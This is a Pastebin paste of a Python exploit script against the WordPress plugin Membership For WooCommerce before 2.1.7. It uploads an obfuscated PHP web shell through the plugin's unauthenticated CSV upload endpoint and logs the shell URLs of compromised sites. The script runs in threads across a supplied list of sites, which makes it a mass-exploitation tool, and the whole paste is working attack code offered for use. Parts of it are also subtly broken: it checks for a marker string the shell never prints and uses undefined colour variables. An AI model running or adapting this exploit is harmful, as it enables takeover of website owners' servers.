API tools faq
paste
FlyFar

Wordpress Plugin - Membership For WooCommerce < v2.1.7 - Arbitrary File Upload to Shell

FlyFar
Apr 7th, 2024
71
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.91 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. # Exploit Title: Wordpress Plugin - Membership For WooCommerce < v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated)
  2. # Date: 2024-02-25
  3. # Author: Milad Karimi (Ex3ptionaL)
  4. # Category : webapps
  5. # Tested on: windows 10 , firefox
  6.  
  7. import sys , requests, re , json
  8. from multiprocessing.dummy import Pool
  9. from colorama import Fore
  10. from colorama import init
  11. init(autoreset=True)
  12.  
  13. headers = {'Connection': 'keep-alive', 'Cache-Control': 'max-age=0',
  14. 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozlila/5.0 (Linux;
  15. Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like
  16. Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'Accept':
  17. 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
  18. 'Accept-Encoding': 'gzip, deflate', 'Accept-Language':
  19. 'en-US,en;q=0.9,fr;q=0.8', 'referer': 'www.google.com'}
  20.  
  21. uploader = """
  22. GIF89a
  23. <?php ?>
  24. <!DOCTYPE html>
  25. <html>
  26. <head>
  27.  <title>Resultz</title>
  28. </head>
  29. <body><h1>Uploader</h1>
  30.  <form enctype='multipart/form-data' action='' method='POST'>
  31.    <p>Uploaded</p>
  32.    <input type='file' name='uploaded_file'></input><br />
  33.    <input type='submit' value='Upload'></input>
  34.  </form>
  35. </body>
  36. </html>
  37. <?PHP
  38. if(!empty($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')])){$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=base64_decode('Li8=');$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485.basename($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('bmFtZQ==')]);if(move_uploaded_file($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('dG1wX25hbWU=')],$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485)){echo
  39. base64_decode('VGhlIGZpbGUg').basename($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('bmFtZQ==')]).base64_decode('IGhhcyBiZWVuIHVwbG9hZGVk');}else{echo
  40. base64_decode('VGhlcmUgd2FzIGFuIGVycm9yIHVwbG9hZGluZyB0aGUgZmlsZSwgcGxlYXNlIHRyeSBhZ2FpbiE=');}}?>
  41. """
  42. requests.urllib3.disable_warnings()
  43.  
  44. def Exploit(Domain):
  45.     try:
  46.         if 'http' in Domain:
  47.           Domain = Domain
  48.         else:
  49.           Domain = 'http://'+Domain
  50.         myup = {'': ('db.php', uploader)}
  51.         req = requests.post(Domain +
  52. '/wp-admin/admin-ajax.php?action=wps_membership_csv_file_upload',
  53. files=myup, headers=headers,verify=False, timeout=10).text
  54.         req1 = requests.get(Domain +
  55. '/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php')
  56.         if 'Ex3ptionaL' in req1:
  57.           print (fg+'[+] '+ Domain + ' --> Shell Uploaded')
  58.           open('Shellz.txt', 'a').write(Domain +
  59. '/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php' + '\n')
  60.         else:
  61.           print (fr+'[+] '+ Domain + '{}{} --> Not Vulnerability')
  62.     except:
  63.         print(fr+' -| ' + Domain + ' --> {} [Failed]')
  64.  
  65. target = open(input(fm+"Site List: "), "r").read().splitlines()
  66. mp = Pool(int(input(fm+"Threads: ")))
  67. mp.map(Exploit, target)
  68. mp.close()
  69. mp.join()
  70.            
Tags: Exploit Plugin wordpress CVE Vulnerability
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!